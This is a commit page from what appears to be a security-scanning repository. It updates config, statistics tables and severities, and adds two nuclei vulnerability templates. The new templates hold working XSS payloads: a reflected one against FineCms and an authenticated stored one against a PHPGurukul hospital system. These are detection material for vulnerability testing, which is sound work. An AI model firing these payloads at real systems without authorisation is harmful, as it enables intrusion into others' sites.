Skip to content

Commit abdcffd

Browse files
hktalenthktalent
committed
fix fingerprint; up PoCs 2022-08-30
1 parent 963841d commit abdcffd

145 files changed

Lines changed: 3777 additions & 2029 deletions

File tree

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

config/config.json

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -66,7 +66,7 @@
6666
"KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$",
6767
"naabu_dns": {},
6868
"naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false},
69-
"priorityNmap": false,
69+
"priorityNmap": true,
7070
"noScan": false,
7171
"enableMultNuclei": false,
7272
"enableNuclei": true,

config/nuclei-templates/README.md

Lines changed: 12 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
4242

4343
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
4444
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
45-
| cve | 1363 | daffainfo | 629 | cves | 1336 | info | 1433 | http | 3740 |
46-
| panel | 627 | dhiyaneshdk | 551 | exposed-panels | 635 | high | 971 | file | 76 |
47-
| lfi | 497 | pikpikcu | 325 | vulnerabilities | 524 | medium | 804 | network | 51 |
48-
| xss | 467 | pdteam | 269 | technologies | 276 | critical | 462 | dns | 17 |
49-
| wordpress | 417 | geeknik | 187 | exposures | 272 | low | 220 | | |
50-
| exposure | 389 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
51-
| cve2021 | 340 | 0x_akoko | 158 | misconfiguration | 215 | | | | |
52-
| rce | 333 | princechaddha | 150 | workflows | 187 | | | | |
53-
| wp-plugin | 312 | pussycat0x | 133 | default-logins | 102 | | | | |
54-
| tech | 288 | gy741 | 126 | file | 76 | | | | |
55-
56-
**293 directories, 4110 files**.
45+
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
46+
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
47+
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
48+
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
49+
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
50+
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
51+
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
52+
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
53+
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
54+
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
55+
56+
**294 directories, 4145 files**.
5757

5858
</td>
5959
</tr>

config/nuclei-templates/TEMPLATES-STATS.json

Lines changed: 1 addition & 1 deletion
Large diffs are not rendered by default.

config/nuclei-templates/TEMPLATES-STATS.md

Lines changed: 1823 additions & 1786 deletions
Large diffs are not rendered by default.

config/nuclei-templates/TOP-10.md

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -1,12 +1,12 @@
11
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
22
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
3-
| cve | 1363 | daffainfo | 629 | cves | 1336 | info | 1433 | http | 3740 |
4-
| panel | 627 | dhiyaneshdk | 551 | exposed-panels | 635 | high | 971 | file | 76 |
5-
| lfi | 497 | pikpikcu | 325 | vulnerabilities | 524 | medium | 804 | network | 51 |
6-
| xss | 467 | pdteam | 269 | technologies | 276 | critical | 462 | dns | 17 |
7-
| wordpress | 417 | geeknik | 187 | exposures | 272 | low | 220 | | |
8-
| exposure | 389 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
9-
| cve2021 | 340 | 0x_akoko | 158 | misconfiguration | 215 | | | | |
10-
| rce | 333 | princechaddha | 150 | workflows | 187 | | | | |
11-
| wp-plugin | 312 | pussycat0x | 133 | default-logins | 102 | | | | |
12-
| tech | 288 | gy741 | 126 | file | 76 | | | | |
3+
| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
4+
| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
5+
| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
6+
| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
7+
| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
8+
| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
9+
| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
10+
| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
11+
| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
12+
| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |

config/nuclei-templates/cnvd/2020/CNVD-2020-23735.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@ id: CNVD-2020-23735
33
info:
44
name: Xxunchi CMS - Local File Inclusion
55
author: princechaddha
6-
severity: medium
6+
severity: high
77
description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
88
reference:
99
- https://www.cnvd.org.cn/flaw/show/2025171

config/nuclei-templates/cnvd/2021/CNVD-2021-30167.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@ id: CNVD-2021-30167
33
info:
44
name: UFIDA NC BeanShell Remote Command Execution
55
author: pikpikcu
6-
severity: high
6+
severity: critical
77
description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
88
reference:
99
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A

config/nuclei-templates/cves/2014/CVE-2014-8682.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@ id: CVE-2014-8682
33
info:
44
name: Gogs (Go Git Service) - SQL Injection
55
author: dhiyaneshDK,daffainfo
6-
severity: high
6+
severity: critical
77
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
88
reference:
99
- https://nvd.nist.gov/vuln/detail/CVE-2014-8682

config/nuclei-templates/cves/2017/CVE-2017-11629.yaml

Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
id: CVE-2017-11629
2+
3+
info:
4+
name: FineCms 5.0.10 - Cross Site Scripting
5+
author: ritikchaddha
6+
severity: medium
7+
description: |
8+
dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
9+
reference:
10+
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
11+
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
12+
classification:
13+
cve-id: CVE-2017-11629
14+
metadata:
15+
verified: true
16+
tags: cve,cve2017,xss,finecms
17+
18+
requests:
19+
- method: GET
20+
path:
21+
- "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"
22+
23+
matchers-condition: and
24+
matchers:
25+
- type: word
26+
part: body
27+
words:
28+
- '<script>alert(document.domain)</script>p不存在'
29+
30+
- type: word
31+
part: header
32+
words:
33+
- text/html
34+
35+
- type: status
36+
status:
37+
- 200

config/nuclei-templates/cves/2020/CVE-2020-5191.yaml

Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
id: CVE-2020-5191
2+
3+
info:
4+
name: Hospital Management System 4.0 - Cross-Site Scripting
5+
author: TenBird
6+
severity: medium
7+
description: |
8+
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
9+
reference:
10+
- https://www.exploit-db.com/exploits/47841
11+
- https://nvd.nist.gov/vuln/detail/CVE-2020-5191
12+
- https://phpgurukul.com/hospital-management-system-in-php/
13+
classification:
14+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15+
cvss-score: 6.1
16+
cve-id: CVE-2020-5191
17+
cwe-id: CWE-79
18+
metadata:
19+
verified: "true"
20+
tags: cve2020,hms,cms,xss,authenticated,edb,cve
21+
22+
requests:
23+
- raw:
24+
- |
25+
POST /hospital/hms/admin/index.php HTTP/1.1
26+
Host: {{Hostname}}
27+
Content-Type: application/x-www-form-urlencoded
28+
29+
username={{username}}&password={{password}}&submit=&submit=
30+
31+
- |
32+
POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
33+
Host: {{Hostname}}
34+
Content-Type: application/x-www-form-urlencoded
35+
36+
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
37+
38+
redirects: true
39+
max-redirects: 2
40+
cookie-reuse: true
41+
matchers-condition: and
42+
matchers:
43+
- type: word
44+
part: body
45+
words:
46+
- '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
47+
48+
- type: word
49+
part: header
50+
words:
51+
- text/html
52+
53+
- type: status
54+
status:
55+
- 200

0 commit comments

Comments
 (0)